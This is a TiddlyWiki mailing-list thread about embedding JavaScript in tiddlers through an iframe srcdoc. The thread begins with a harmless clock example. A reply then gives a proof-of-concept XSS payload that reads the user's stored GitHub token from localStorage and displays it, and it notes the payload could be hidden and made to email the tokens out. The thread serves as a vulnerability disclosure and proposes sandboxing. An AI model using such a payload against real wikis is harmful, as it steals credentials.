cj.v.., I don't have much experience with JS macros in TW, but I can imagine it would be the same, especially if there is no sanitisation whatsoever. As to eliminating iframes, normally there is no way to break-out of it. However, in the case of my Proof-of-Concept with TW, the localStorage is global, and can be accessed by ANY SITE. This is just one more reason I believe TW should use browser cookies: they are not accessible from inside iframe, and have more options for security and access.
On Monday, August 16, 2021 at 11:51:35 AM UTC-4 cj.v...@gmail.com wrote: > It kind of sounds like the iFrame element should then be outright > eliminated from the web entirely. > > That might be problematic. > > Re security, couldn't any tiddler that is a javascript macro be altered > for nefarious purposes just as easily as injecting malicious javascript > into an iFrame? > > On Monday, August 16, 2021 at 12:39:41 PM UTC-3 flanc...@gmail.com wrote: > >> This seems EXTREMELY INSECURE. What is to stop an attacker from injecting >> malicious JS into a tiddler, regardless of whether it is "sandboxed". >> Paste this Proof-of-Concept into a blank tiddler. What it does it steals >> your GitHub PAT if you have it configured, and alerts it to you. While I >> have not done it here, I could easily make it both invisible and have it >> email me the PAT's it gathers. >> >> CODE: >> <$vars vSrcDoc={{{ [[<body> <div >> id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML = >> `<a id="xss" href="javascript:alert('Your GitHub Token >> is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you >> probably don\\'t have TW GitHub saving configured');"></a>`; >> document.getElementById('xss').click();</script></body>]] }}}> >> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe> >> </$vars> >> >> Long-story-short, an attacker can easily bypass any sanitation TW >> employs, and harvest credentials from various sites. It is my belief that >> this issue needs to be fixed immediately, and brought to the attention of >> Jeremy and other devs. >> >> I would be happy to help on the repair process. I have some experience >> with PenTesting and fixing XSS vulnerabilities (mainly in my own >> applications). I would recommend adding a listener to TW changes, and >> checking for an iframe code. If it does contain this, TW should add a >> sandbox constraint on it ( >> https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox >> ) >> >> On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote: >> >>> Updated one of the tiddlers in the JSON package. New version attached. >>> >>> The addition highlighted below: >>> >>> <body> >>> <div id="clockDiv"></div> >>> <script> >>> *document.oncontextmenu = function() { * >>> * return false; * >>> *};* >>> let clockEl = document.getElementById("clockDiv"); >>> ... >>> >>> The reason for the added code: block access to the back button in the >>> iFrame (by blocking access to the entire menu), which winds up performing >>> the back button operation on the entire browser page. >>> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote: >>> >>>> I don't know what made me think of this. >>>> >>>> In case this has not been brought up in a while (I doubt this is new to >>>> seasoned folk) ... >>>> >>>> I was thinking: could I use an iFrame to include simple javascript in a >>>> tiddler without getting into macros or plugins that enable javascript. >>>> >>>> And, if I could, then could I set things up so that the iFrame is >>>> showing javascript dynamically created by the tiddler ? >>>> >>>> So here is a way to show a digital clock in TiddlyWiki, for >>>> non-programmers who just want to copy and paste javascript code from the >>>> web without figuring out how the javascript code works : >>>> >>>> Put this in a brand new tiddler: >>>> >>>> *<$vars* *vSrcDoc*={{{ [[<body> <div id="clockDiv"></div> <script> >>>> let clockEl = document.getElementById("clockDiv"); function >>>> getClockTime() { let date = new Date(); let hr = >>>> date.getHours(); let min = date.getMinutes(); let sec = >>>> date.getSeconds(); hr = ("0" + hr).slice(-2); min = ("0" + >>>> min).slice(-2); sec = ("0" + sec).slice(-2); clockEl.innerHTML = >>>> `${hr}:${min}:${sec}`; } setInterval(getClockTime, 1000); >>>> </script></body>]] }}}*>* >>>> *<iframe* srcdoc=*<<vSrcDoc>>* style="border:none;width:100%;" >>>> *></iframe>* >>>> *</$vars>* >>>> >>>> Sneaky sneaky, has me wondering what kind of other fun things could be >>>> done... >>>> >>> -- You received this message because you are subscribed to the Google Groups "TiddlyWiki" group. To unsubscribe from this group and stop receiving emails from it, send an email to tiddlywiki+unsubscr...@googlegroups.com. To view this discussion on the web visit https://groups.google.com/d/msgid/tiddlywiki/1a6658ea-0df4-453b-a739-e0025fb9a71fn%40googlegroups.com.